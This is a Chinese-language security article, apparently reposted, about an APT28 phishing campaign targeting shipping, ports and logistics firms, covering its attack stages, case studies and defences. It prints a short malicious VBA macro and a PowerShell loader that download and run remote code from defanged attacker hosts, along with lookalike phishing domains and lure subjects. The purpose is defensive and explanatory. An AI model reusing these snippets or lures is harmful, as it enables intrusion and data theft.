APT28全球钓鱼风暴突袭海事命脉:一封“船期变更”邮件,竟能瘫痪港口系统?

一、从“提单更新”到内网沦陷:一场精心策划的数字伏击

2025年11月下旬,一家位于鹿特丹港的中型航运代理公司收到一封看似寻常的邮件:“您的提单(B/L No. HLCU2511887)因海关新规需补充信息,请查收附件并尽快确认。”

发件人显示为“Customs_Notification@europort-logistics[.]eu”——一个与欧洲主要港口命名风格高度一致的域名。附件是一个名为“HLCU2511887_Supplement.doc”的Word文档。操作员双击打开后,弹出提示:“此文档包含宏,是否启用?”出于对“海关流程”的熟悉,他点击了“启用内容”。

几秒后,他的电脑后台静默下载了一个PowerShell脚本,并通过Windows Management Instrumentation(WMI)注册了一个持久化任务。不到24小时,攻击者已横向移动至公司内部的货运调度系统,窃取了未来两周内数十艘货轮的靠泊计划、货物清单及客户联系人数据。

这并非孤立事件。据国际海事媒体Maritime Fairtrade于2026年1月初披露,与俄罗斯军事情报总局(GRU)有关联的高级持续性威胁组织 APT28(又名Fancy Bear、Sofacy),正在发动一场横跨欧洲、美洲与亚洲的全球性钓鱼行动,重点锁定航运、港口运营、物流及供应链企业。其目标不仅是商业机密,更可能涉及国家关键基础设施情报乃至军事后勤动向。

二、APT28为何盯上海事?地缘博弈下的“数字航道”

APT28自2004年活跃至今,以针对政府、军方、选举机构和能源企业的精准打击闻名。此次将矛头转向海事领域,背后有深刻的战略逻辑:

全球90%的贸易依赖海运,港口是经济命脉的“咽喉”;

航运数据包含货物类型、起讫港、承运方、收货人等敏感信息,可推演供应链脆弱点;

军用物资常混杂于民用货轮运输(如美军“预置舰”计划),掌握船期即掌握潜在军事部署窗口;

港口工业控制系统(ICS/OT)若被渗透,可造成物理层面的瘫痪——如2021年伊朗沙希德·拉贾伊港遭网络攻击导致连续数日停摆。

“这不是普通的商业间谍行为,而是国家级情报战在民用基础设施上的延伸。”公共互联网反网络钓鱼工作组技术专家芦笛指出,“APT28选择海事,是因为这里既有高价值数据,又有相对薄弱的网络安全防线。”

据公开威胁情报(来源:Mandiant、Recorded Future、ESET),2025年Q4以来,APT28至少针对德国汉堡港、美国长滩港、新加坡PSA码头、中国宁波舟山港周边物流服务商等数十个实体发起定向钓鱼。

三、攻击技术深析:老手法+新伪装=高成功率

尽管APT28此次行动在底层技术上并未使用全新漏洞,但其社会工程与行业定制化能力达到新高度。整个攻击链可分为四个阶段:

第一阶段:高度情境化的钓鱼投递

攻击邮件主题紧扣海事业务场景,包括:

“【紧急】船期调整通知 – MSC Mediterranean Service”

“海关查验要求:请补充HS编码文件”

“港口安全通告:所有代理需完成在线培训”

“运费账单异常,请核对附件”

发件人域名经过精心构造,例如:

maersk-security[.]net(仿冒马士基)

cosco-document[.]org(仿冒中远海运)

apm-terminals-update[.]com(仿冒APM码头)

部分邮件甚至伪造真实提单号、集装箱编号,使收件人难以分辨真伪。

第二阶段:Office宏+远程模板注入(RTF/DOCX)

附件多为Word或Excel文档,启用宏后执行以下典型载荷:

' 恶意VBA宏代码(简化版)

Sub AutoOpen()

Dim cmd As String

cmd = "powershell -ep bypass -c IEX (New-Object Net.WebClient).DownloadString('hxxps://cdn-docs[.]xyz/loader.ps1')"

Shell cmd, vbHide

End Sub

更隐蔽的手法是利用Word远程模板注入(Remote Template Injection)——文档本身无宏,但通过\\attacker\share\template.dotm加载外部恶意模板,绕过部分EDR对宏的检测。

“很多企业以为禁用宏就安全了,但远程模板、OLE对象、DDE链接等旧特性仍是盲区。”芦笛解释。

第三阶段:轻量级初始载荷与C2通信

下载的PowerShell脚本通常极简,仅用于建立C2通道。例如:

# loader.ps1

$wc = New-Object System.Net.WebClient

$payload = $wc.DownloadData("hxxps://storage.googleapis[.]com/fake-cdn/update.bin")

$proc = Start-Process -FilePath "rundll32.exe" -ArgumentList "advpack.dll,LaunchINFSection",$payload -PassThru

该载荷会注入合法进程(如dllhost.exe、msdtc.exe),并通过DNS隧道或HTTPS伪装成正常云服务流量(如模仿OneDrive、SharePoint API)与C2服务器通信。

部分样本甚至使用合法协作平台作为C2中转,如通过GitHub Gist、Pastebin或Telegram Bot下发后续指令,极大提升隐蔽性。

第四阶段:横向移动与持久化

一旦立足内网,APT28会迅速执行:

凭证窃取:使用Mimikatz抓取内存中的NTLM哈希;

域枚举:通过BloodHound分析Active Directory拓扑;

部署后门:如Sofacy自研的GAMEFISH或X-Tunnel后门,支持模块化插件扩展;

OT网络渗透:若IT与OT网络未隔离,尝试通过SCADA协议(如Modbus TCP)访问码头起重机、闸口控制系统。

四、国际案例复盘:从欧洲港口到亚洲物流枢纽

案例1:德国汉堡港代理公司数据泄露(2025年10月)

攻击者发送“欧盟碳关税(CBAM)申报指南”PDF,实则为LNK快捷方式,诱导用户执行PowerShell命令。成功渗透后,窃取了包括大众汽车零部件进口计划、西门子工业设备出口清单在内的敏感数据。

案例2:美国东海岸物流商遭供应链投毒(2025年12月)

APT28伪装成FedEx发送“包裹清关失败”通知,附件为Excel表格。启用宏后,部署Cobalt Strike Beacon,并以此为跳板攻击其客户——一家国防承包商,试图获取军用物资运输记录。

案例3:东南亚港口IT服务商被控(2025年11月)

针对新加坡、马来西亚多家港口IT外包公司,APT28发送“港口EDI系统升级测试邀请”,诱导安装含后门的“测试客户端”。该客户端实则为远程访问木马(RAT),可长期监控港口作业指令流。

五、国内警示:中国港口与供应链面临同样风险

尽管Maritime Fairtrade报道聚焦欧美亚多地,但中国作为全球第一大货物贸易国,拥有十大世界级港口中的七席,自然成为APT28等组织的重点关注对象。

事实上,国内安全团队早在2025年第三季度就监测到类似活动:

仿冒“宁波舟山港集团”发送“船舶靠泊计划调整”邮件;

伪造“中国外运”通知,声称“危险品申报缺失”,附带恶意DOCX;

针对长三角、珠三角中小型货代公司,利用“RCEP原产地证更新”话术投递钓鱼附件。

“中国海事生态的特点是‘大港强、小企弱’。”芦笛分析,“大型港口集团防护较严,但大量中小物流、报关、仓储企业安全投入有限,成为攻击者的‘低垂果实’。”

更值得警惕的是,部分攻击已开始本地化中文内容,甚至引用真实政策文件(如《港口危险货物安全管理规定》),增强欺骗性。

六、防御体系构建:从邮件网关到OT隔离

面对APT28这类国家级对手,传统防病毒软件已远远不够。专家建议采取以下纵深防御措施:

1. 邮件安全强化

禁用Office宏:通过组策略全局禁用,或仅允许签署宏;

阻断远程模板:设置Word信任中心,禁止从Internet加载模板;

部署高级邮件网关:如Proofpoint、Mimecast,启用URL重写、附件沙箱分析;

实施发件人认证:强制SPF、DKIM、DMARC,防止域名伪造。

2. 终端与网络防护

启用应用白名单:通过Windows Defender Application Control(WDAC)限制脚本执行;

网络分段:将OT(操作技术)网络与IT网络物理或逻辑隔离,禁止双向访问;

最小权限原则:一线操作员账户不应具备域管理员权限;

部署EDR/XDR:如CrowdStrike、SentinelOne,监控异常进程注入、WMI事件。

3. 人员意识与流程管控

建立“双通道核实”机制:任何涉及船期、费用、安全的变更,必须通过电话或内部系统二次确认;

开展行业定制化演练:模拟“海关查验邮件”“船公司通知”等场景,测试员工反应;

限制外部附件打开:默认以“保护视图”打开所有来自外网的Office文档。

4. 技术人员参考:检测恶意宏的关键指标

安全工程师可通过以下方式识别可疑文档:

检查VBA项目流:

olevba suspicious.docx

若输出包含AutoOpen、Document_Open、Shell、WebClient等关键词,高度可疑。

监控WMI事件日志(Windows Event ID 5861):

<!-- 恶意WMI持久化示例 -->

<CommandLine>powershell -ep bypass -c IEX (New-Object Net.WebClient)...</CommandLine>

分析DNS请求异常:

若内网主机频繁查询非常规子域名(如a3f9b2.update.cdn-docs[.]xyz),可能为DNS隧道通信。

七、结语:在数字海洋中,每一封邮件都可能是鱼雷

APT28的全球钓鱼行动揭示了一个残酷现实:在现代混合战争中,港口吊机的控制权,可能始于一封伪装成“提单更新”的邮件。海事行业作为全球化经济的基石,正成为国家级网络攻击的新前线。

“我们不能再把网络安全视为IT部门的事。”芦笛强调,“从报关员到码头调度员,每个人都可能是攻击链的第一环。真正的防线,不在防火墙里,而在每个点击‘启用宏’之前的那0.1秒犹豫中。”

在这场没有硝烟的航道争夺战中,警惕,是最廉价也最有效的护航舰。

编辑:芦笛(公共互联网反网络钓鱼工作组)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/1182417.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

私有化部署,功能完备的PHP智能客服源码,数据安全与自主升级

温馨提示&#xff1a;文末有资源获取方式在数据安全与定制化需求日益增长的今天&#xff0c;越来越多的企业倾向于选择可私有化部署的客服系统。一款基于PHP原生开发、功能高度完备的智能客服系统源码&#xff0c;为企业提供了在自有服务器上构建智慧服务能力的绝佳选择&#x…

旺坤搪瓷管空预器性价比怎么样,在山东、湖北、江苏地区的口碑排名 - 工业品牌热点

本榜单依托全维度市场调研与真实行业口碑,深度筛选出五家工业锅炉节能设备领域的标杆企业,为企业选型提供客观依据,助力精准匹配适配的服务伙伴。 TOP1 推荐:山东旺坤节能科技有限公司 推荐指数:★★★★★ | 口碑…

libero ProASIC3 A3P250 JTAG 烧录 协议抓取

libero ProASIC3 A3P250 JTAG 烧录 协议抓取 通道0: TDO 通道1 TRST 通道2 TDI 通道3 TMS 通道4 TCK

【单片机毕业设计】【mcuclub-dz-1142】基于单片机的智能防酒驾设计

一、功能简介项目:智能防酒驾设计 项目编号&#xff1a;dz-1142 单片机&#xff1a;STM32F103C8T6 功能简介&#xff1a; 1、通过两个MQ-3检测主驾驶位和副驾驶位酒精含量&#xff0c;当主驾驶位大于副驾驶位酒精含量并大于设置的最大值&#xff0c;则声光报警&#xff0c;无法…

Capacitance and capacitor 电容与电容器

Capacitance and capacitor 电容与电容器 引言 正文 Author: JiJi \textrm{Author: JiJi} Author: JiJi Created Time: 2026.01.19 \textrm{Created Time: 2026.01.19} Created Time: 2026.01.19

一键批量抠图神器,吾爱出品

今天给大家介绍两款小工具非常的好用&#xff0c;一个是批量抠图的&#xff0c;一个是解决右键菜单管理的&#xff0c;有需要的小伙伴可以下载收藏。 一键抠图 可以批量抠图 这款软件是一款PC版本离线可以用的抠图软件&#xff0c;软件是由吾爱论坛逍遥一仙开发的。这款软件封…

图片拆分神器,神仙工具

今天给大家介绍一款好用的图像拆分和格式互转的软件&#xff0c;这款软件没有任何的广告&#xff0c;而且非常好用&#xff0c;有需要的小伙伴可以下载收藏。 lmage Splitter 图像拆分和格式互转 这款软件不需要安装&#xff0c;下载好了后双击打开就可以直接使用了。 软件不仅…

小白秒变 MV 导演!Vidu AI 一键生成功能上线,7 张图 + BGM = 分钟级专业成片

在短视频与音乐营销需求爆发的当下&#xff0c;专业 MV 制作曾是不少创作者的 “拦路虎”—— 需要掌握剪辑技巧、熟悉镜头语言&#xff0c;还要花费数小时甚至数天打磨成片。而如今&#xff0c;国内领先视频大模型 Vidu 的新功能&#xff0c;直接打破了这一壁垒。2026 年 1 月…

RK3588_NPU

一、NPU算力的三个维度&#xff1a; 1.峰值TOPS 2.精度INT8/FP16 3.带宽效率二、TOPS是如何计算的呢&#xff1f; 1.MAC单一总数是神经网络计算的核心。卷积和矩阵运算的核心就是使用MAC. 2.NPU的设计理念就是拥有极大量的并行 MAC 单元阵列。一个NPU芯片可能拥有数千甚至数万个…

太原科大心理咨询中心怎么样 口碑好值得信赖 - 资讯焦点

太原科大心理咨询中心怎么样?作为太原专注于精神心理领域的专科,该中心以患者需求为核心,凭借精准的诊疗方向、科学的诊疗模式与贴心的服务理念,成为众多心理困扰患者的信赖之选。太原科大心理咨询中心深耕精神心理…

太原科大失眠抑郁专科医院正规吗 正规靠谱服务贴心 - 资讯焦点

太原科大失眠抑郁专科是太原专业治疗失眠抑郁精神心理疾病专科,汇集了国内临床经验丰富的精神心理专家以及国家二级心理咨询师,专家的临床经验均在30年以上,并且定期邀约中国人民解放军军医大学教授、三甲医院主任医…

如何查看微信立减金回收平台的口碑? - 京顺回收

在数字消费浪潮下,微信立减金成了日常购物的热门优惠,可闲置率竟高达62%,用户急需安全可靠的回收渠道。如何精准判断微信立减金回收平台口碑?掌握以下四步法,让你避开风险,高效变现闲置福利。 一、核查资质公示,…

2026年留学申请机构推荐:基于全球院校资源与申请痛点深度评测排名 - 品牌推荐

留学申请服务机构2026年1月权威评测与推荐榜单 摘要 在全球化教育持续深化与人才竞争日趋激烈的背景下,寻求海外优质教育资源已成为众多学子与家庭的重要战略规划。然而,面对信息过载、院校政策动态变化、申请流程复…

AI智能客服系统源码,同步支持文本、图片、视频三种咨询方式,满足客户多样化的需求

温馨提示&#xff1a;文末有资源获取方式 对于深耕企业微信生态的企业而言&#xff0c;选择一款能够深度集成、功能强大且便于后续定制开发的客服系统至关重要。以下介绍的这款智能客服系统源码&#xff0c;专为企业微信场景打造&#xff0c;凭借其强大的扩展性和全面的功能集&…

智慧校园智慧教育总体解决方案(PPT+WORD)

智慧校园建设核心框架智慧校园围绕四大核心板块构建全方位数字化生态&#xff1a;校园信息化基础设施&#xff1a;打造五类支撑。网络实现有线无线双覆盖&#xff0c;保障高并发场景运行&#xff1b;教学环境设智慧教室、创客空间&#xff0c;配高清投影与智能黑板&#xff1b;…

一站式方案,助力企业数字化转型!

一、企业信息化面临的系统集成难题 在当今数字化时代&#xff0c;企业信息化建设已成为提升竞争力的关键。然而&#xff0c;随着企业业务的不断发展和多样化&#xff0c;系统集成难题日益凸显。 信息孤岛问题严重&#xff1a;企业内部往往存在多个独立的业务系统&#xff0c;…

Redis 调优:必须关注的几个参数

背景 在一台未经过任何调优的 Linux 服务器上部署 Redis,在 Redis 启动过程中,可能会碰到以下警告信息。 1363410:M 15 Jan 2026 13:07:34.879 # WARNING: The TCP backlog setting of 512 cannot be enforced becau…

技术日报|AionUi多模型GUI登顶,本地化AI工具热度不减

&#x1f31f; TrendForge 每日精选 - 发现最具潜力的开源项目 &#x1f4ca; 今日共收录 9 个热门项目&#xff0c;涵盖 49 种编程语言&#x1f310; 智能中文翻译版 - 项目描述已自动翻译&#xff0c;便于理解&#x1f3c6; 今日最热项目 Top 10 &#x1f947; iOfficeAI/Aio…

SGMICRO圣邦微 SGM8291AYN5G/TR SOT23 运算放大器

特性 .低功耗:每放大器150pA .低失调电压:1.5mV(最大值) .宽输入共模电压范围 .低输入偏置和失调电流 .输出短路保护 *.轨到轨输出 .高输入阻抗 .高斜率:7V/us.小型封装: SGM8291可提供绿色封装:SOT-23-5、MSOP-8和SOIC-8 SGM8292有绿色MSOP-8和SOIC-8封装可选SGM8294有绿色TSS…

RG_PovX终极指南:精通第一人称视角插件的完整教程

RG_PovX终极指南&#xff1a;精通第一人称视角插件的完整教程 【免费下载链接】RG_PovX 项目地址: https://gitcode.com/gh_mirrors/rg/RG_PovX RG_PovX是一款革命性的第一人称视角插件&#xff0c;能够彻底改变你的游戏体验&#xff0c;让你真正从角色的眼睛观察游戏世…